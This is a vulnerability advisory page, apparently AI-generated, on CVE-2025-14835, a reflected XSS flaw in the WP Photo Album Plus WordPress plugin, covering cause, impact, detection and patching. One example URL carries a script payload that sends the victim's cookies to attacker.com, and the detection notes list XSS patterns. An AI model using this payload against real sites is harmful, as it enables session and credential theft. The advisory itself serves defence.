
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14835 is a Reflected Cross-Site Scripting (XSS) vulnerability in the WP Photo Album Plus plugin for WordPress. It affects all versions up to and including 9.1.05.008, caused by insufficient input sanitization and output escaping of the shortcode parameter. Unauthenticated attackers can inject arbitrary web scripts that execute in a victim's browser if the victim is tricked into clicking a malicious link. The vulnerability was published on January 7, 2026, and carries a CVSS v3.1 base score of 7.1 (High) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page) and CWE-79 (Cross-site Scripting). The vulnerable shortcode parameter is processed without adequate sanitization in the plugin's AJAX handler (wppa-ajax.php) and filter logic (wppa-filter.php), allowing attacker-controlled input to be reflected directly into the HTML response (ENISA EUVD). Exploitation requires no authentication or special privileges — only that a victim user clicks a crafted link, making this a classic reflected (non-persistent) XSS attack vector. Relevant source code references include wppa-ajax.php#L1130, wppa-ajax.php#L43, wppa-filter.php#L125, and wppa-functions.php#L5617 (WordPress Trac).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session on the affected WordPress site. This can lead to session cookie theft, credential harvesting, defacement of page content as seen by the victim, or redirection to malicious sites. The CVSS scope is marked as Changed, indicating that the impact extends beyond the vulnerable component itself, with low confidentiality, integrity, and availability impacts (Wordfence).
No evidence of active in-the-wild exploitation or inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog has been reported for this CVE. The EPSS score is approximately 0.08%, indicating a low probability of exploitation in the near term (Feedly). The vulnerability requires user interaction (victim clicking a crafted link), which somewhat limits opportunistic mass exploitation. No public proof-of-concept exploit code has been identified beyond the source code references disclosed by Wordfence.
shortcode parameter, e.g., https://target-site.com/wp-admin/admin-ajax.php?action=wppa_ajax&shortcode=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.shortcode parameter is reflected in the server's HTML response and the injected script executes in the victim's browser.admin-ajax.php) containing URL-encoded script tags or JavaScript payloads in the shortcode parameter; outbound requests from victim browsers to unknown external domains shortly after visiting a WordPress page.shortcode parameter values containing <script>, javascript:, onerror=, or similar XSS patterns; unusual referrer headers in server logs indicating crafted link delivery.Users should update the WP Photo Album Plus plugin to a version beyond 9.1.05.008, which includes the fix applied in the trunk changeset (WordPress Trac Changeset). As a temporary workaround, site administrators can disable the plugin until a patched version is applied. Deploying a Web Application Firewall (WAF) with XSS filtering rules can help mitigate exploitation attempts in the interim (Wordfence).
Wordfence disclosed this vulnerability as part of their weekly WordPress vulnerability report for January 5–11, 2026, noting it as one of many plugin-level XSS issues discovered during that period (Wordfence Blog). No significant broader media coverage or notable researcher commentary beyond the Wordfence disclosure has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."